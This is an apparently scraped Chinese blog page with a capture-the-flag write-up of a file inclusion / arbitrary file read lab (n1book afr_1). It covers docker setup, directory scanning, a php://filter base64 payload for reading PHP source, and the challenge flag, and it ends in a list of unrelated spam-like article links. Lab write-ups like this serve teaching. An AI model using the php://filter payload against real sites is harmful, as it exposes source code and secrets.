当前位置: 首页 > news >正文

免费设计字体国内好的seo

免费设计字体,国内好的seo,亚马逊电商运营新手入门,做企业网站需要提供什么1.1漏洞描述 漏洞名称任意文件读取漏洞 afr_1漏洞类型文件读取漏洞等级⭐漏洞环境docker攻击方式 1.2漏洞等级 高危 1.3影响版本 暂无 1.4漏洞复现 1.4.1.基础环境 靶场docker工具BurpSuite 1.4.2.靶场搭建 1.创建docker-compose.yml文件 version: 3.2 services: web: …

1.1漏洞描述

漏洞名称任意文件读取漏洞 afr_1
漏洞类型文件读取
漏洞等级
漏洞环境docker
攻击方式

1.2漏洞等级

高危

1.3影响版本

暂无

1.4漏洞复现

1.4.1.基础环境

靶场docker
工具BurpSuite

1.4.2.靶场搭建

        1.创建docker-compose.yml文件

version: '3.2'

services:
  web:
    image: registry.cn-hangzhou.aliyuncs.com/n1book/web-file-read-1:latest
    ports:
      - 80:80

        2.将该代码写入文件

启动方式

docker-compose up -d

flag

n1book{afr_1_solved}

关闭

sudo docker-compose down

        3.访问kali 80端口

        搭建成功 

1.5深度利用

1.5.1漏洞点

  • 1.dirsearch目录扫描

dirsearch --url http://10.9.47.79 

  • 2.查看 /flag.php

  • 3.查看/index.php

  • 发现跳转到 ?p=hello

所以可能是/index.html包含了?p=hello

文件包含

  • 4.使用php://fileter 读取(读取php源码)

?filepath=php://filter/read=convert.base64-encode/resource=[目标文件]

  • 它读取到的结果是base64加密的 

PD9waHAKZGllKCdubyBubyBubycpOwovL24xYm9va3thZnJfMV9zb2x2ZWR9

  • 5.进行base64解码

  • 6.成功拿到flag

n1book{afr_1_solved}

1.6漏洞挖掘

1.6.1指纹信息

1.7修复建议

  • 升级

  • 打补丁

  • 上设备

http://www.yayakq.cn/news/778502/

相关文章:

  • 网站建设的技术风险分析与规避网站建设开发语言
  • 网站建设肆金手指排名4wordpress qqword
  • 潍坊模板建站定制辽宁建设厅官网
  • 营销型网站建设ppt做几何图形和网站
  • html5微网站demowordpress伪静态win
  • 罗湖网站建设的公司哪家好seo营销技巧
  • 上海外贸网站设计网站策划书最后一步怎么做
  • 内蒙古建设部网站免费网站排名优化在线
  • 昆明做网站首选互维企业宣传片一分钟多少钱
  • 衡阳市建设局网站开封市建设局网站
  • 爱站工具包的模块wordpress自动采集源码
  • 沈阳网站关键词优化成都展示型网页制作公司
  • 做淘宝网站需要多少钱搭建购物商城
  • 云浮市做网站的公司北京网站设计公司排行
  • 广东省网站备案深圳工程造价信息网
  • 天津市建设网站wordpress会员制网站
  • 潍坊网站建设 诸城网站建设方案2000字
  • app开发 网站建设php网站开发速成
  • 可以玩小游戏的网站免费做电脑网站吗
  • 国外网站推广软件自己做网站如何月入3k
  • 衡阳做淘宝网站建设兼职做效果图的网站有哪些
  • 建筑公司网站新年贺词品牌网站建设熊掌号
  • 北京定制网站系统开发的大概步骤
  • 网站seo注意事项哪些企业需要网络推广
  • 温州专业网站制作设计网站搭建详细教程
  • 凡科代理建站登录apt 安装wordpress
  • c2c网站建设实例最近实时热点新闻事件
  • 南京 网站备案网站建设结构安排论文
  • 网站卖链接个人主页怎么设置
  • 娄底网站建设的话术上海工厂网站建设